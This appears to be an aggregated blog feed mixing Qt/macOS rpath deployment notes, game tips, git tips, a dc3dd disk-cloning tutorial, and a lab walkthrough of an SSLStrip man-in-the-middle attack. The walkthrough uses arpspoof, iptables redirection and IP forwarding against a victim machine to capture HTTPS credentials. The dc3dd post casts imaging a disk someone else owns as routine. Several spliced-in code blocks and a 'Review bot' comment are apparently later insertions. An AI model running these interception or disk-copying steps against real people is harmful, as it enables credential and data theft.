    • ex. /Applications/Foo.app/Contents/MacOS
    • useful for frameworks embedded inside the application
  • @loader_path: the folder path of the related plug-in’s code
    • ex. /Library/Application Support/Foo/Plug-Ins/Bar.bundle/Contents/MacOS
    • useful for frameworks embedded inside plug-ins
    • available from Mac OS X 10.4
  • @rpath: instructs the dynamic linker to search a list of paths in order to locate the framework
    • no need to specify the “install path” using either @executable_path or @loader_path, but pass additional flags when building the host application (ex. -rpath @executable_path/../Frameworks or /Library/Frameworks)
    • available from Mac OS X 10.5

otool

The second reason I was stuck is that otool didn’t resolve @rpath names, so I was confused when it always returned me the same thing.

However, Scott wrote another version of otool that resolves the rpaths here. Here are the steps that demonstrate the difference:

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
/Users/heron/Qt/5.6/clang_64/lib

> macdeployqt ./*.app -verbose=3 -always-overwrite -appstore-compliant

> otool -L bibi.app/Contents/MacOS/bibi
bibi.app/Contents/MacOS/bibi:
@rpath/QtWidgets.framework/Versions/5/QtWidgets (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtGui.framework/Versions/5/QtGui (compatibility version 5.6.0, current version 5.6.0)
@rpath/QtCore.framework/Versions/5/QtCore (compatibility version 5.6.0, current version 5.6.0)
/System/Library/Frameworks/OpenGL.framework/Versions/A/OpenGL (compatibility version 1.0.0, current version 1.0.0)
/System/Library/Frameworks/AGL.framework/Versions/A/AGL (compatibility version 1.0.0, current version 1.0.0)
/usr/lib/libc++.1.dylib (compatibility version 1.0.0, current version 120.1.0)
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 1226.10.1)

> otool-rpath bibi.app/Contents/MacOS/bibi
@executable_path/../Frameworks
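The two otool-rpath results above decide where the same @rpath install names end up pointing. The following is an added example, not Scott's otool-rpath and not code from the original post; the bundle path is shortened, the file lists are constructed, and the function names are hypothetical. It resolves the install names from the otool -L output against each rpath in order and reports whether a library would load from inside the bundle, from a system location, from somewhere else on disk, or not at all.

```javascript
'use strict';
const path = require('path').posix;

// Install names as printed by `otool -L` in the post (subset).
const INSTALL_NAMES = [
  '@rpath/QtWidgets.framework/Versions/5/QtWidgets',
  '@rpath/QtCore.framework/Versions/5/QtCore',
  '/usr/lib/libSystem.B.dylib',
];
const BUNDLE = '/Users/heron/bibi.app';            // constructed, shortened bundle path
const QT_LIB = '/Users/heron/Qt/5.6/clang_64/lib'; // rpath before macdeployqt (from the post)

// Expand @executable_path and @loader_path at the start of a path.
function expandTokens(p, ctx) {
  const tokens = { '@executable_path': ctx.executableDir, '@loader_path': ctx.loaderDir };
  for (const [token, dir] of Object.entries(tokens)) {
    if (p === token || p.startsWith(token + '/')) {
      return path.normalize(dir + p.slice(token.length));
    }
  }
  return path.normalize(p);
}

// An @rpath/... name is tried against every rpath entry in order; the first
// candidate that exists wins. Other names are used directly.
function resolveInstallName(name, ctx, exists) {
  const candidates = name.startsWith('@rpath/')
    ? ctx.rpaths.map((rp) => path.normalize(expandTokens(rp, ctx) + name.slice('@rpath'.length)))
    : [expandTokens(name, ctx)];
  return candidates.find((c) => exists(c)) || null;
}

// Classify where each dependency would be loaded from.
function auditInstallNames(names, ctx, exists) {
  return names.map((name) => {
    const resolved = resolveInstallName(name, ctx, exists);
    let status = 'external'; // loads code from outside the bundle
    if (resolved === null) status = 'unresolved';
    else if (resolved.startsWith(ctx.bundleRoot + '/')) status = 'bundled';
    else if (resolved.startsWith('/System/') || resolved.startsWith('/usr/lib/')) status = 'system';
    return { name, resolved, status };
  });
}

// Constructed file lists standing in for three machines/states.
function fakeFs(files) {
  const set = new Set(files);
  return (p) => set.has(p);
}
const FRAMEWORKS = ['QtWidgets', 'QtCore'].map((f) => f + '.framework/Versions/5/' + f);
const SYSTEM_FILES = ['/usr/lib/libSystem.B.dylib'];
const DEV_FILES = SYSTEM_FILES.concat(FRAMEWORKS.map((f) => QT_LIB + '/' + f));
const BUNDLED_FILES = SYSTEM_FILES.concat(FRAMEWORKS.map((f) => BUNDLE + '/Contents/Frameworks/' + f));

function scenarios() {
  const base = {
    bundleRoot: BUNDLE,
    executableDir: BUNDLE + '/Contents/MacOS',
    loaderDir: BUNDLE + '/Contents/MacOS',
  };
  const before = Object.assign({ rpaths: [QT_LIB] }, base);
  const after = Object.assign({ rpaths: ['@executable_path/../Frameworks'] }, base);
  return {
    beforeOnDevMachine: auditInstallNames(INSTALL_NAMES, before, fakeFs(DEV_FILES)),
    beforeOnCleanMachine: auditInstallNames(INSTALL_NAMES, before, fakeFs(SYSTEM_FILES)),
    afterOnCleanMachine: auditInstallNames(INSTALL_NAMES, after, fakeFs(BUNDLED_FILES)),
  };
}

for (const [label, rows] of Object.entries(scenarios())) {
  console.log(label, rows.map((r) => r.status).join(', '));
}
```

An `external` result is worth a second look before shipping: the binary works only where that absolute directory exists, and it runs whatever library sits there.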

macdeployqt

The last reason I failed to understand what’s going on is the output of macdeployqt, which confused me.

> macdeployqt bibi.app
File exists, skip copy: "bibi.app/Contents/PlugIns/platforms/libqcocoa.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/printsupport/libcocoaprintersupport.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqdds.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqgif.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqicns.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqico.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqjpeg.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtga.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqtiff.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwbmp.dylib"
File exists, skip copy: "bibi.app/Contents/PlugIns/imageformats/libqwebp.dylib"
WARNING:
WARNING: "bibi.app/Contents/Resources/qt.conf" already exists, will not overwrite.
WARNING: To make sure the plugins are loaded from the correct location,
WARNING: please make sure qt.conf contains the following lines:
WARNING: [Paths]
WARNING: Plugins = PlugIns

However, in Scott’s solution, he gave the following additional arguments:

  • -verbose=3: see in detail how the rpaths are updated (Scott’s log)
  • -always-overwrite: copy files even if the target file exists, so the first (Scott: I used “always-overwrite” to get predictable results after repeated testing, since the Qt frameworks would be copied into the app bundle.)
  • -appstore-compliant: skip deployment of components that use private API (Scott: appstore-compliant was just for your convenience)

Test

Testing is one additional thing that made the original question harder to solve: there’s no easy way to see if my app bundle works on another machine without Qt installed.

Instead of asking friends to run the app, Scott mentioned that we can use lsof at run-time.

> ps aux|grep bibi
heron 21610 0.0 0.5 2632680 40272 ?? S Tue09PM 5:32.80 /Users/heron/Project/bibi/bibi/build-bibi-Desktop_Qt_5_6_0_clang_64bit-Release/bibi.app/Contents/MacOS/bibi
heron 39245 0.0 0.0 2434840 664 s003 R+ 9:31AM 0:00.00 grep --color=auto bibi

> lsof -p 39183 | grep QtCore
bibi 21610 heron txt REG 1,4 6441676 168354669 /Users/heron/Qt-free/5.6/clang_64/lib/QtCore.framework/Versions/5/QtCore

After macdeployqt, the app bundle no longer needs to link to frameworks outside the bundle:

> ps aux|grep bibi
heron 39352 0.0 0.0 2435864 788 s003 S+ 9:32AM 0:00.00 grep --color=auto bibi
heron 39315 0.0 0.8 2611176 63000 ?? S 9:32AM 0:00.68 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/MacOS/bibi

> lsof -p 39315 | grep QtCore
bibi 39315 heron txt REG 1,4 6017532 171823963 /Users/heron/Project/bibi/bibi/bibi/bibi.app/Contents/Frameworks/QtCore.framework/Versions/5/QtCore

Summary

I would say the biggest problem is that I didn’t know how to read @rpath, so Scott’s otool-rpath or lsof eventually helped.

Reference

by Heron Yang (noreply@blogger.com) at May 05, 2016 02:46 AM

April 24, 2016

April 16, 2016

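Clash Royale: Reaching Arena 7 Free-to-Play (2238 Trophies)

A good game needs everyone's support; I will look for a chance to spend some money to support the game.

Mortar deck

I first used this deck to reach 2000. Its strength is strong defense, slowly chipping away with the Mortar. But if I lose a tower first, it is extremely hard to win. After trying several combinations, I find it most stable to open with a hut and build the Mortar once I have 7 elixir. That puts my side in a position where it cannot lose.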

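Hog Rider deck

Later I switched to the Hog Rider for fast attacks, winning some and losing some, then shoring up the weak points. The base cards are:

  • Offense: Hog Rider, Lightning (counters buildings, Wizard and Witch; also chips health and finishes off low-health targets)
  • Defense: Cannon, two anti-air cards, Arrows or Fireball

The remaining two cards are adjusted to fit the deck. After trying many combinations, I finally found this to run most smoothly:

  • Hog Rider and Prince can attack the same lane or different lanes, which adds fast-attack combinations
  • Baby Dragon and Prince can defend, and on the counterattack Spear Goblins added behind them wear down some of the opponent's Crown Tower health.
  • Fireball is harder to aim than Arrows but usable in more situations. Switching to Arrows means adding a Valkyrie to handle Barbarians or a swarm of troops pouring in. Fireball easily gains an elixir advantage when a large army pours in.
  • Skeletons can resolve many situations for an elixir advantage (even taking out a Minion Horde!), and they make it easy to cycle cards. When time is almost up and I am two Lightning strikes short, this is just right.

Other combinations I tried that were decent but not smooth enough:

  • Zap: raises the Hog Rider's attack success rate, but Prince + Fireball gives a better balance of offense and defense.
  • Mini P.E.K.K.A.: attacking alongside the Hog Rider works as well as the Prince, but it defends worse than the Prince. The Prince is a bit more stable.
  • Musketeer: great against Balloons, but with so little health she is easily taken out on offense (by Fireball, for example). The Baby Dragon has only half the Musketeer's attack, but with more health and being airborne it survives longer and adds pressure on the opponent.
  • Valkyrie: very strong on defense, but a bit weak on the counterattack; switching to Fireball is more flexible for both offense and defense.

Hog Rider + Prince can reach 2100+, but beyond that it is still not smooth enough. I was also tired of playing Hog Rider, so I switched to a new deck built around the Mini P.E.K.K.A.: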

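Mini P.E.K.K.A. deck

The core idea: the Mini P.E.K.K.A. hits very hard; if the opponent carelessly lets it slip into range, the Crown Tower falls in just a few swings.

But the Mini P.E.K.K.A. has too little health, so there are two supporting attack plans:

  • Use the Giant Skeleton to distract the opponent and drain their defensive cards. Then, depending on the situation, attack from the other lane or follow the Giant Skeleton.
  • Use Zap to clear small troops or zap the Crown Tower so the Mini P.E.K.K.A. gets at least one swing at the tower. For example, I send the Mini P.E.K.K.A. forward, the opponent plays Minion Horde, and I Zap the Minion Horde; spending 6 elixir this way deals 400+ damage to the opponent and burns 5 of their elixir (the half-dead Minion Horde is easy to finish off afterwards).

Support troops:

  • Spear Goblins can support behind the Giant Skeleton and Mini P.E.K.K.A. by clearing small troops. Perhaps replacing Goblins with Archers would make offense and defense more flexible and make it easier to cycle into attack combinations.
  • Minion Horde is for dealing with Balloons, or for supporting the attack once I confirm the opponent has no Arrows.
  • Lightning is for taking down defensive buildings or hut decks. It is especially good against Bomb Tower and Inferno Tower.

Also, the Giant Skeleton defends very well, so I can safely drop Fireball for Zap.

Other

Next I want to go back to decks with very strong offense. I used to play P.E.K.K.A. + Wizard + Elixir Collector but could not get past 2000 trophies. I don't know whether it was the deck or my lack of skill at the time. I have a level 1 Golem but am not good at using it. Today I pulled a level 1 Dark Prince, but its health at level 1 is a bit low; in the 2000-trophy range, it feels safer to wait until level 2 before using it?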

by fcamel (noreply@blogger.com) at April 16, 2016 10:04 AM

How to git merge a renamed file

References:

If file X was renamed to Y in a branch, and both master and the branch changed the contents of X (Y), then when merging master, git may report that master's X was deleted, causing a merge conflict (deleted in ... and modified in ...).

The fix is to raise merge.renameLimit, for example git config merge.renameLimit 999999999. The merge takes a bit longer, but git will find that X has already been renamed to Y in the branch.

by fcamel (noreply@blogger.com) at April 16, 2016 03:51 AM

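Using vimdiff for git merge

Reference article

I used to use kdiff3; later I needed to merge in a terminal and tried vimdiff, which also works well.

Setup:

$ git config --global merge.tool vimdiff

Run (after git merge leaves unresolved conflicts):

$ git mergetool

UI layout:

  • Top left: LOCAL
  • Top middle: BASE
  • Top right: REMOTE
  • Bottom: editing area

vim commands:

  • [c, ]c: move between hunks, same as vim-gitgutter
  • Search for "<<<<" to find conflicts
  • :diffget LOCAL: use LOCAL for the current hunk
  • :diffget REMOTE: use REMOTE for the current hunk
  • :diffupdate: refresh the diff view

After editing, save and quit, and the conflict is automatically marked as resolved. Quitting without changes skips the merge and leaves the file in its original state.

Other

Check the merge status:

$ git status

If the whole file should use LOCAL, use the git command instead:

$ git checkout --ours -- <path>

Use REMOTE for everything:

$ git checkout --theirs -- <path>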

by fcamel (noreply@blogger.com) at April 16, 2016 03:30 AM

April 15, 2016

GNU Make

← Older revision Revision as of 10:24, 15 April 2016
Line 1: Line 1:
 
== Recommended Reading ==
 
== Recommended Reading ==
 
* [http://www.gnu.org/software/make/manual/html_node/Quick-Reference.html GNU Make Manual Appendix A Quick Reference]
 
* [http://www.gnu.org/software/make/manual/html_node/Quick-Reference.html GNU Make Manual Appendix A Quick Reference]
 +
* [http://elinux.org/Debugging_Makefiles elinux: Debugging Makefiles]
 
* [http://oreilly.com/catalog/make3/book/index.csp Managing Projects with GNU Make 3rd Ed. by Robert Mecklenburg]
 
* [http://oreilly.com/catalog/make3/book/index.csp Managing Projects with GNU Make 3rd Ed. by Robert Mecklenburg]
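Review bot: The added elinux.org entry uses a plain http:// URL and a site-prefixed label ("elinux: Debugging Makefiles"), while the neighbouring entries name the work itself; consider linking over https:// if the site offers it and labelling the entry "Debugging Makefiles (eLinux.org)" so the list reads consistently.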
  

by Scott.tsai at April 15, 2016 10:24 AM

April 10, 2016

Kali Tool Series - dc3dd

“dc3dd is a patched version of GNU dd with added features for computer forensics” - from ForensicsWiki.

Comparison to GNU dd

While I was using dd, I found it hard to know how long it would take, and whether the cloning completed without error. However, dc3dd fixes all these problems by providing:

  • on the fly hashing with multiple algorithms (MD5, SHA-1, SHA-256, and SHA-512)
  • progress reports
  • writing errors directly to a file

When and Why using dd or dc3dd

In movies or TV series, we see hackers plug in a USB disk and copy all the data off the machine, and that’s the case where we can use dd or dc3dd.

To be more specific, the flow is:

  • insert a Kali live USB disk into the target machine
  • do the Kali Forensics Boot
  • dd or dc3dd the disk of the target machine into a file on the Kali USB disk or another USB disk

Usage

I use VMs, so I won’t have the target machine in this example. However, you can pretend the disk I am going to clone (/dev/sda5) is the disk of the target machine. And, I am cloning the disk into a file stored in another USB disk.

First of all, list out the partitions of all the disks.

> fdisk -l

Disk /dev/sda: 20 GiB, 21474836480 bytes, 41943040 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x7b852532

Device Boot Start End Sectors Size Id Type
/dev/sda1 * 2048 40136703 40134656 19.1G 83 Linux
/dev/sda2 40138750 41940991 1802242 880M 5 Extended
/dev/sda5 40138752 41940991 1802240 880M 82 Linux swap / Solaris

Disk /dev/sdb: 3.8 GiB, 4026531840 bytes, 7864320 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x893a988d

Device Boot Start End Sectors Size Id Type
/dev/sdb1 976 7864319 7863344 3.8G b W95 FAT32

Pick the one you want to clone later. Here I am using the Linux swap partition (/dev/sda5), which is kind of meaningless but enough for practice.

Then, locate the place where you want to save the cloned disk image. Usually, you would want to use another USB disk, since the machine may not belong to you and what you want to do is clone the disk, save it to the USB disk, then take it away. I will save the file on the /dev/sdb disk, which is mounted at /media/root/0909-B70D/disk-img/.

Start dc3dd:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
261455872 bytes ( 249 M ) copied ( 28% ), 33 s, 7.6 M/s

  • if: input disk location
  • of: output image location
  • hash: calculate the hash on the fly

Verification

After the cloning is completed, we can check whether the file is exactly the same as the original by comparing the hashes:

> dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256

dc3dd 7.2.641 started at 2016-04-10 12:56:50 +0800
compiled options:
command line: dc3dd if=/dev/sda5 of=/media/root/0909-B70D/disk-img/cloned hash=sha256
device size: 1802240 sectors (probed), 922,746,880 bytes
sector size: 512 bytes (probed)
922746880 bytes ( 880 M ) copied ( 100% ), 236 s, 3.7 M/s

input results for device `/dev/sda5':
1802240 sectors in
0 bad sectors replaced by zeros
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f (sha256)

output results for file `/media/root/0909-B70D/disk-img/cloned':
1802240 sectors out

dc3dd completed at 2016-04-10 13:00:45 +0800

> file /media/root/0909-B70D/disk-img/cloned
/media/root/0909-B70D/disk-img/cloned: Linux/i386 swap file (new style), version 1 (4K pages), size 225279 pages, no label, UUID=767f785e-d7fb-4b3c-9f8e-b02761db620e
> sha256sum /media/root/0909-B70D/disk-img/cloned
f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f /media/root/0909-B70D/disk-img/cloned

As you can see, the swap file is copied, and the hashes are the same (f1409a56a4518860c45b23ef95e9dfd50d12bf98fbdb9eb72f39d2fc2182e79f).
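The comparison done by eye above can be repeated later, for instance after the image has been moved, by checking the file against the acquisition log. The following is an added example, not part of dc3dd or of the original post; it assumes the log layout shown above, uses a constructed four-sector image and log, and its function names are hypothetical.

```javascript
'use strict';
const crypto = require('crypto');
const fs = require('fs');
const os = require('os');
const path = require('path');

// Parse the "input results" section of a dc3dd log (layout as shown in the post).
function parseDc3ddLog(logText) {
  const info = { source: null, sectorsIn: null, badSectors: null, hashes: {} };
  let inInput = false;
  for (const raw of logText.split(/\r?\n/)) {
    const line = raw.trim();
    let m;
    if ((m = /^input results for (?:device|file) `(.+)':$/.exec(line))) {
      inInput = true;
      info.source = m[1];
    } else if (/^output results for /.test(line)) {
      inInput = false;
    } else if (inInput && (m = /^(\d+) sectors in$/.exec(line))) {
      info.sectorsIn = Number(m[1]);
    } else if (inInput && (m = /^(\d+) bad sectors replaced by zeros$/.exec(line))) {
      info.badSectors = Number(m[1]);
    } else if (inInput && (m = /^([0-9a-f]+) \((md5|sha1|sha256|sha512)\)$/.exec(line))) {
      info.hashes[m[2]] = m[1];
    }
  }
  return info;
}

// Hash a file in 1 MiB chunks so a multi-gigabyte image need not fit in memory.
function hashFile(filePath, algorithm) {
  const hash = crypto.createHash(algorithm);
  const fd = fs.openSync(filePath, 'r');
  try {
    const buf = Buffer.alloc(1024 * 1024);
    let n;
    while ((n = fs.readSync(fd, buf, 0, buf.length, null)) > 0) {
      hash.update(buf.subarray(0, n));
    }
  } finally {
    fs.closeSync(fd);
  }
  return hash.digest('hex');
}

// Compare an image on disk with what the acquisition log recorded.
function verifyImage(logText, imagePath, sectorSize = 512) {
  const info = parseDc3ddLog(logText);
  const problems = [];
  const algorithms = Object.keys(info.hashes);
  if (algorithms.length === 0) problems.push('log contains no input hash');
  if (info.badSectors !== null && info.badSectors > 0) {
    problems.push(info.badSectors + ' bad sectors were replaced by zeros');
  }
  if (info.sectorsIn !== null && fs.statSync(imagePath).size !== info.sectorsIn * sectorSize) {
    problems.push('image size does not match "sectors in"');
  }
  for (const algo of algorithms) {
    if (hashFile(imagePath, algo) !== info.hashes[algo]) problems.push(algo + ' mismatch');
  }
  return { ok: problems.length === 0, problems };
}

// Constructed demo: a 4-sector image plus a matching log, then one byte flipped.
function demo() {
  const dir = fs.mkdtempSync(path.join(os.tmpdir(), 'dc3dd-verify-'));
  const image = path.join(dir, 'cloned');
  const data = Buffer.alloc(4 * 512, 0xa5);
  fs.writeFileSync(image, data);
  const digest = crypto.createHash('sha256').update(data).digest('hex');
  const log = [
    "input results for device `/dev/sdX1':",
    '   4 sectors in',
    '   0 bad sectors replaced by zeros',
    '   ' + digest + ' (sha256)',
    '',
    'output results for file `' + image + "':",
    '   4 sectors out',
  ].join('\n');
  const intact = verifyImage(log, image);
  const altered = Buffer.from(data);
  altered[100] = 0x00; // simulate corruption or tampering after acquisition
  fs.writeFileSync(image, altered);
  const tampered = verifyImage(log, image);
  fs.rmSync(dir, { recursive: true, force: true });
  return { intact, tampered };
}

console.log(JSON.stringify(demo(), null, 2));
```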

Kali Forensics Boot

By doing the Kali Forensics Boot, one gains a lot from staying silent. That is, the Kali Forensics Boot provides the following features:

  • the internal hard disk is never touched
  • auto-mounting of removable media is disabled

Reference

by Heron Yang (noreply@blogger.com) at April 10, 2016 05:45 AM

April 06, 2016

Kali Tool Series - SSLStrip

Refer to “How does SSLstrip work?” on StackExchange: SSLStrip is a type of MitM attack that forces a victim’s browser into communicating with an adversary in plain-text over HTTP, and the adversary proxies the modified content from an HTTPS server. To do this, SSLStrip is “stripping” https:// URLs and turning them into http:// URLs.
> sslstrip -h

sslstrip 0.9 by Moxie Marlinspike
Usage: sslstrip <options>

Options:
-w <filename>, --write=<filename> Specify file to log to (optional).
-p , --post Log only SSL POSTs. (default)
-s , --ssl Log all SSL traffic to and from server.
-a , --all Log all SSL and HTTP traffic to and from server.
-l <port>, --listen=<port> Port to listen on (default 10000).
-f , --favicon Substitute a lock favicon on secure requests.
-k , --killsessions Kill sessions in progress.
-h Print this help message.

Overview

We will use ARP spoofing to obtain the victim’s traffic, which means that the traffic will go through our Kali machine and then be passed on to the victim or the server he/she is communicating with. Then, we will be listening on port 80, the basic HTTP port. All the traffic on port 80 will be redirected to SSLStrip, and SSLStrip will handle the rest of the HTTPS traffic.
The expected result was that the attacker would be able to read the requests between the victim and the HTTPS websites he/she is visiting, which may contain valuable cookies or passwords. However, in my experiment, SSLStrip crashed, and it seems that this method is out of date.

Find the Gateway IP

> route -n
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 1024 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
192.168.63.2 0.0.0.0 255.255.255.255 UH 1024 0 0 eth0

or,
> netstat -nr
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
0.0.0.0 192.168.63.2 0.0.0.0 UG 0 0 0 eth0
192.168.63.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0
So, the Gateway IP is 192.168.63.2 in my case.

Find the Victim IP

As I run Kali in a VM, I will let the victim be an Ubuntu server, which is another VM on my machine. I ran this on my Ubuntu:
> ifconfig
eth0 Link encap:Ethernet HWaddr 00:0c:29:4f:5f:5b
inet addr:192.168.63.152 Bcast:192.168.63.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fe4f:5f5b/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:118 errors:0 dropped:0 overruns:0 frame:0
TX packets:81 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:15530 (15.5 KB) TX bytes:14538 (14.5 KB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:16 errors:0 dropped:0 overruns:0 frame:0
TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1184 (1.1 KB) TX bytes:1184 (1.1 KB)
That is, the victim IP is 192.168.63.152. If you have no access to the victim machine, you can use commands like nmap -sP 192.168.63.0/24 to search.

IP Routing

We are going to redirect Kali’s inbound traffic from 80 to the port SSLStrip is running on (let’s use 5050 here).
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 5050
To check if the routing rule is set:
> iptables -L -vt nat
Chain PREROUTING (policy ACCEPT 100 packets, 13501 bytes)
pkts bytes target prot opt in out source destination
16 960 REDIRECT tcp -- any any anywhere anywhere tcp dpt:http redir ports 5050

If you want to clean up and reset, here’s a way to clear all PREROUTING rules:
for i in $( iptables -t nat -L PREROUTING --line-numbers | grep '^[0-9]' | awk '{ print $1 }' | tac ); do iptables -t nat -D PREROUTING "$i"; done

IP Forwarding

Since we are going to do ARP spoofing later, we have to enable IP forwarding first. So, whenever the Kali machine receives packets, it will send them on to the proper destination. We call this MitM (Man in the Middle).
> echo 1 > /proc/sys/net/ipv4/ip_forward
> cat /proc/sys/net/ipv4/ip_forward # check
1

ARP Spoof

Now, in order to let the traffic flow through our Kali machine (MitM), we need ARP spoofing. The syntax is:
> arpspoof -i interface -t target_IP -r gateway_IP
In our case:
> arpspoof -i eth0 -t 192.168.63.152 -r 192.168.63.2
0:c:29:80:9a:85 0:50:56:e9:3:c 0806 42: arp reply 192.168.63.156 is-at 0:c:29:5a:28:9e
0:c:29:80:9a:85 0:c:29:5a:28:9e 0806 42: arp reply 192.168.63.2 is-at 0:50:56:e9:3:c

The process is blocking, and we should keep it running.
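From the victim's side, the effect of the step above is visible in its own ARP cache: the gateway's IP now maps to a MAC address that also answers for another host. The following is an added example of that check, not code from the original post; the `arp -an` lines and the baseline gateway MAC are constructed sample values (the IP addresses are the ones used in this post), and the function names are hypothetical.

```javascript
'use strict';

// Constructed `arp -an` output as it could look on a host whose gateway entry
// has been poisoned. Sample values only.
const SAMPLE_ARP_TABLE = [
  '? (192.168.63.2) at 0:c:29:80:9a:85 [ether] on eth0',
  '? (192.168.63.155) at 00:0c:29:80:9a:85 [ether] on eth0',
  '? (192.168.63.1) at 00:50:56:c0:00:08 [ether] on eth0',
  '? (192.168.63.254) at <incomplete> on eth0',
].join('\n');

// "0:c:29:80:9a:85" (the style arpspoof prints) and "00:0c:29:80:9a:85"
// are the same address; compare them in one canonical form.
function normalizeMac(mac) {
  return mac.toLowerCase().split(':').map((octet) => octet.padStart(2, '0')).join(':');
}

// Extract { ip, mac, iface } from each complete entry; incomplete ones are skipped.
function parseArpTable(text) {
  const entries = [];
  const pattern = /\((\d{1,3}(?:\.\d{1,3}){3})\) at ([0-9a-fA-F]{1,2}(?::[0-9a-fA-F]{1,2}){5})\b.* on (\S+)/;
  for (const line of text.split(/\r?\n/)) {
    const m = pattern.exec(line);
    if (m) entries.push({ ip: m[1], mac: normalizeMac(m[2]), iface: m[3] });
  }
  return entries;
}

// Two independent signals:
//  - one MAC answering for several IPs on the same interface
//  - the gateway's MAC differing from a known-good baseline
function findArpAnomalies(entries, gatewayIp, knownGatewayMac) {
  const findings = [];
  const ipsByMac = new Map();
  for (const e of entries) {
    const key = e.iface + ' ' + e.mac;
    if (!ipsByMac.has(key)) ipsByMac.set(key, new Set());
    ipsByMac.get(key).add(e.ip);
  }
  for (const [key, ips] of ipsByMac) {
    if (ips.size > 1) {
      findings.push({
        type: 'mac-claims-multiple-ips',
        mac: key.split(' ')[1],
        ips: [...ips].sort(),
        involvesGateway: ips.has(gatewayIp),
      });
    }
  }
  const gateway = entries.find((e) => e.ip === gatewayIp);
  if (gateway && knownGatewayMac && gateway.mac !== normalizeMac(knownGatewayMac)) {
    findings.push({
      type: 'gateway-mac-changed',
      expected: normalizeMac(knownGatewayMac),
      observed: gateway.mac,
    });
  }
  return findings;
}

// Baseline MAC recorded earlier for the gateway (constructed value).
const KNOWN_GATEWAY_MAC = '0:50:56:e9:3:c';
const FINDINGS = findArpAnomalies(parseArpTable(SAMPLE_ARP_TABLE), '192.168.63.2', KNOWN_GATEWAY_MAC);
console.log(JSON.stringify(FINDINGS, null, 2));
```

A router doing proxy ARP can legitimately answer for several IPs with one MAC, so the duplicate-MAC signal is strongest when the gateway is involved or the baseline comparison also fires.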

SSLStrip

Start SSLStrip on port 5050 (or any port you like, just make sure it matches the one we used in IP Routing).
> sslstrip -l 5050

sslstrip 0.9 by Moxie Marlinspike running...

Victim Browse HTTPS Websites

Since my victim only has a command-line interface, I am using lynx as my browser.
> lynx http://www.paypal.com
In Wireshark on Kali, we can tell that ARP spoofing is working because all the packets show up duplicated. (In the screenshot, the upper part was captured when ARP spoofing was off, and all the traffic looks normal. The lower part was captured when ARP spoofing was on; we can see that Kali received all the traffic to/from the victim, 192.168.63.152, then passed it through.)


SSLStrip Result

SSLStrip crashed right when the user was about to connect to the HTTPS website. I’ve tried the latest SSLStrip 0.9.2, but it crashes in the same way. I also found that other users are suffering from this issue as well: sslstrip on non hsts site error #17 and Execptions in twisted #15.
Here’s the error:
sslstrip 0.9 by Moxie Marlinspike running...
Unhandled Error
Traceback (most recent call last):
File "sslstrip.py", line 105, in main
reactor.run()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1192, in run
self.mainLoop()
File "/usr/lib/python2.7/dist-packages/twisted/internet/base.py", line 1204, in mainLoop
self.doIteration(t)
File "/usr/lib/python2.7/dist-packages/twisted/internet/epollreactor.py", line 396, in doPoll
log.callWithLogger(selectable, _drdw, selectable, fd, event)
--- <exception caught here> ---
